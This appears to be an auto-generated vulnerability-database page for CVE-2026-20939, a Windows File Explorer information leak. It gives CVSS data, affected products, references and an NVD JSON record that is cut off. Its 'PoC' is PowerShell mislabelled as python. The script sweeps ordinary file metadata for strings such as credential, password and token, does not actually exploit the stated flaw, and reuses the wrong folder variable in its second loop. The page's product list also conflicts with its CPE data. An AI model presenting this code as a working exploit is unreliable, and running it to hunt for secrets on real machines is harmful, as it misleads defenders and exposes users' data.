CVE-2026-20939

Description

Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:* - VULNERABLE

Windows 10 1507

Windows 10 1607

Windows 10 1703

Windows 10 1709

Windows 10 1803

Windows 10 1809

Windows 10 1903

Windows 10 1909

Windows 10 2004

Windows 10 20H2

Windows 10 21H1

Windows 10 21H2

Windows 10 22H2

Windows 11 21H2

Windows 11 22H2

Windows 11 23H2

Windows Server 2016

Windows Server 2019

Windows Server 2022

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-20939 PoC - Windows File Explorer Information Disclosure
# This PoC demonstrates how an attacker can extract sensitive file metadata

$shell = New-Object -ComObject Shell.Application
$folder = $shell.Namespace("C:\Windows\System32")

# Enumerate files and extract metadata properties
$properties = @()
foreach ($file in $folder.Items()) {
    # Try to access sensitive metadata fields
    for ($i = 0; $i -lt 300; $i++) {
        $propertyName = $folder.GetDetailsOf($null, $i)
        $propertyValue = $folder.GetDetailsOf($file, $i)
        
        # Filter for potentially sensitive information
        if ($propertyValue -match "(author|path|credential|password|token)") {
            $properties += [PSCustomObject]@{
                FileName = $file.Name
                PropertyName = $propertyName
                PropertyValue = $propertyValue
            }
        }
    }
}

# Display extracted sensitive information
$properties | Format-Table -AutoSize

# Alternative method using WMI
Get-ChildItem -Path "C:\" -Recurse -File -ErrorAction SilentlyContinue | Select-Object -First 100 | ForEach-Object {
    $shellItem = $shell.Namespace($_.DirectoryName).ParseName($_.Name)
    # Extract all available metadata
    $metadata = @{}
    for ($i = 0; $i -lt 300; $i++) {
        $name = $folder.GetDetailsOf($null, $i)
        $value = $folder.GetDetailsOf($shellItem, $i)
        if ($value) { $metadata[$name] = $value }
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20939
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20939
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20939/
[4] VulDB https://vuldb.com/cve/CVE-2026-20939
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20939

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20939", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:21.140", "lastModified": "2026-01-16T15:52:31.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally."}, {"lang": "es", "value": "Exposición de información sensible a un actor no autorizado en el Explorador de Archivos de Windows permite a un atacante autorizado divulgar información localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "9A956D23-259E-450B-8406-FEB2BBED1F39"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "41D387B9-5E9D-47CB-B044-D7D10FFFB458"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "DD4CBDAB-7626-4048-8474-B1BD9C1F3255"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A6D4C631-2CC0-407C-9ACA-7C151006598C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "9CFC3200-1FAB-4AB1-A008-F703EEF3505A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "E481E93D-D86E-4B65-93E5-200327C348C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "F720EC9F-6A33-445F-AFA1-794405737E57"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": "85E22F96-B552-4BBA-AFA1-85C1FC55DB32"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": "5ACD940D-CA6A-402B-B132-E5A66139C44F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": "354AD10F-EEF4-461D-BDBB-245B97E3D420"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "7D2B0BB9-E94A-420E-8E53-A4C1136DE73E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "78C4B71B-5345-4D83-A0A9-A15F783CF9A9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "208734FD-5175-4856-9D08-ED6CFF64AA14"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "846261D4-ECC2-4DCB-8F8F-F27F8C99F061"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "33E138A3-968B-4109-AC13-D488685F0AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "CC1FE5A1-3E6E-4606-899B-BF7BF3D3DD8D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "A059E609-F8D4-4246-BDAE-0AEDED1744D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A74970A1-CC81-4482-B465-8382B1544EF3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4648", "matchCriteriaId": "C4AA6991-DE34-48F6-AFD3-77CEE7FBB692"}, {"vulnerable": true, "criteria": "cpe:2.3:o:mi ... (truncated)